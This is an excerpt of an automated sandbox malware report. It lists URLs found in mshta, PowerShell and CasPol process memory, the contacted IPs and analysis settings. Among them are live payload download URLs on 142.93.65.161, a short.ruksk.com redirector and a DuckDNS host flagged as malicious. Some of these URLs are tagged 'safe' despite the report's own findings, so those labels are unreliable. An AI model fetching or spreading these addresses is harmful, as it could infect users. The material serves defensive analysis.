                                                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...rTmmshta.exe, 00000004.00000002.446412500.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://cache.btrll.com/default/Pix-1x1.gifbhv5265.tmp.29.drfalse
                                                    		high
                                                    https://www.google.comCasPol.exe, CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFa%0Ipowershell.exe, 00000012.00000002.505196924.000000001A931000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...rmshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://geoplugin.net/json.gp/CCasPol.exe, 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://o.aolcdn.com/ads/adswrappermsni.jsbhv5265.tmp.29.drfalse
                                                          		high
                                                          http://www.msn.com/?ocid=iehpbhv5265.tmp.29.drfalse
                                                            		high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://static.chartbeat.com/js/chartbeat.jsbhv5265.tmp.29.drfalse
                                                                		high
                                                                http://www.msn.com/de-de/?ocid=iehpbhv5265.tmp.29.drfalse
                                                                  		high
                                                                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&pacemakermshta.exe, 00000004.00000003.440649981.0000000000162000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446606437.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.nirsoft.net/CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.467820686.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.523814321.00000000020C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.557478401.0000000002141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://go.crpowershell.exe, 00000007.00000002.474546983.000000001C45C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.505629322.000000001C211000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv5265.tmp.29.drfalse
                                                                          		high
                                                                          http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htaymshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv5265.tmp.29.drfalse
                                                                            		high
                                                                            https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv5265.tmp.29.drfalse
                                                                              		high
                                                                              http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv5265.tmp.29.drfalse
                                                                                		high
                                                                                http://www.imvu.comCasPol.exe, CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://contoso.com/Iconpowershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://contextual.media.net/bhv5265.tmp.29.drfalse
                                                                                      		high
                                                                                      https://short.ruksk.com/usmshta.exe, 00000004.00000003.440649981.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446412500.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000019F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv5265.tmp.29.drfalse
                                                                                        		high
                                                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv5265.tmp.29.drfalse
                                                                                          		high
                                                                                          http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFppowershell.exe, 00000007.00000002.467820686.0000000002594000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.msn.com/bhv5265.tmp.29.drfalse
                                                                                            		high
                                                                                            https://res.cloudinary.compowershell.exe, 0000000C.00000002.523814321.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.557478401.0000000002340000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv5265.tmp.29.drfalse
                                                                                                		high
                                                                                                http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFApowershell.exe, 00000007.00000002.473316971.000000001A7C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                  		high
                                                                                                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv5265.tmp.29.drfalse
                                                                                                    		high
                                                                                                    https://policies.yahoo.com/w3c/p3p.xmlbhv5265.tmp.29.drfalse
                                                                                                      		high
                                                                                                      https://short.ruksk.com/Datmshta.exe, 00000004.00000003.440649981.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446412500.000000000019F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446132664.000000000019F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.msn.com/advertisement.ad.jsbhv5265.tmp.29.drfalse
                                                                                                          		high
                                                                                                          http://b.scorecardresearch.com/beacon.jsbhv5265.tmp.29.drfalse
                                                                                                            		high
                                                                                                            http://acdn.adnxs.com/ast/ast.jsbhv5265.tmp.29.drfalse
                                                                                                              		high
                                                                                                              http://ocsp.entrust.net03mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://contoso.com/Licensepowershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 0000001D.00000002.549016177.0000000002363000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htapC:mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv5265.tmp.29.drfalse
                                                                                                                      		high
                                                                                                                      http://142.93.65.161/mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487780679.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.0000000003A20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv5265.tmp.29.drfalse
                                                                                                                        		high
                                                                                                                        https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv5265.tmp.29.drfalse
                                                                                                                          		high
                                                                                                                          http://go.microspowershell.exe, 00000007.00000002.467820686.0000000002B76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker_0200011080.xls, CC430000.0.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comCasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIF1powershell.exe, 00000007.00000002.473316971.000000001A7C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv5265.tmp.29.drfalse
                                                                                                                                		high
                                                                                                                                https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerXmshta.exe, 0000000E.00000002.492377174.00000000000CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerLmshta.exe, 0000000E.00000002.492377174.0000000000113000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerOmshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.000000000011F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv5265.tmp.29.drfalse
                                                                                                                                  		high
                                                                                                                                  https://contoso.com/powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv5265.tmp.29.drfalse
                                                                                                                                      		high
                                                                                                                                      http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv5265.tmp.29.drfalse
                                                                                                                                        		high
                                                                                                                                        https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                                                                          		high
                                                                                                                                          https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerImshta.exe, 00000004.00000002.446390710.000000000012A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htard=wee&XKymshta.exe, 0000000E.00000003.486492468.0000000000131000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv5265.tmp.29.drfalse
                                                                                                                                              		high
                                                                                                                                              https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemakerAmshta.exe, 0000000E.00000003.490334526.000000000011E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.000000000011F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htacC:mshta.exe, 0000000E.00000003.490334526.0000000000188000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.0000000000188000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.0000000000188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv5265.tmp.29.drfalse
                                                                                                                                                		high
                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://142.93.65.161/6mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://www.ccleaner.com/go/app_cc_pro_trialkeybhv5265.tmp.29.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htakmshta.exe, 0000000E.00000002.493049973.00000000039A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://short.ruksk.com/MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker/mshta.exe, 00000004.00000002.446412500.000000000019F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://contextual.media.net/8/nrrV73987.jsbhv5265.tmp.29.drfalse
                                                                                                                                                        		high
                                                                                                                                                        http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htahttp://142.93.65.1mshta.exe, 00000004.00000003.443541028.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445667762.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.488460874.0000000002BF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv5265.tmp.29.drfalse
                                                                                                                                                          		high
                                                                                                                                                          http://142.93.65.161/680/weneedkissingwellongirlfriendshebeautifulgirl.tIFC:powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://short.ruksk.com/mshta.exe, 00000004.00000003.446100049.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446057103.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490334526.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487780679.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.486492468.0000000000131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.492377174.0000000000131000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta...0nmshta.exe, 00000004.00000003.440649981.000000000014F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.htaGmshta.exe, 0000000E.00000002.493049973.00000000039A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://cdn.at.atwola.com/_media/uac/msn.htmlbhv5265.tmp.29.drfalse
                                                                                                                                                              		high

                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public IPs

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              142.93.65.161
                                                                                                                                                              		unknownUnited States
                                                                                                                                                              		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                              31.13.224.72
                                                                                                                                                              		apamanollonan.duckdns.orgBulgaria
                                                                                                                                                              		48584SARNICA-ASBGtrue
                                                                                                                                                              178.237.33.50
                                                                                                                                                              		geoplugin.netNetherlands
                                                                                                                                                              		8455ATOM86-ASATOM86NLfalse
                                                                                                                                                              151.101.65.137
                                                                                                                                                              		cloudinary.map.fastly.netUnited States
                                                                                                                                                              		54113FASTLYUSfalse
                                                                                                                                                              54.150.207.131
                                                                                                                                                              		short.ruksk.comUnited States
                                                                                                                                                              		16509AMAZON-02USfalse

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                              Analysis ID:1567364
                                                                                                                                                              Start date and time:2024-12-03 13:59:29 +01:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 9m 34s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                              Number of analysed new started processes analysed:33
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • GSI enabled (VBA)
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
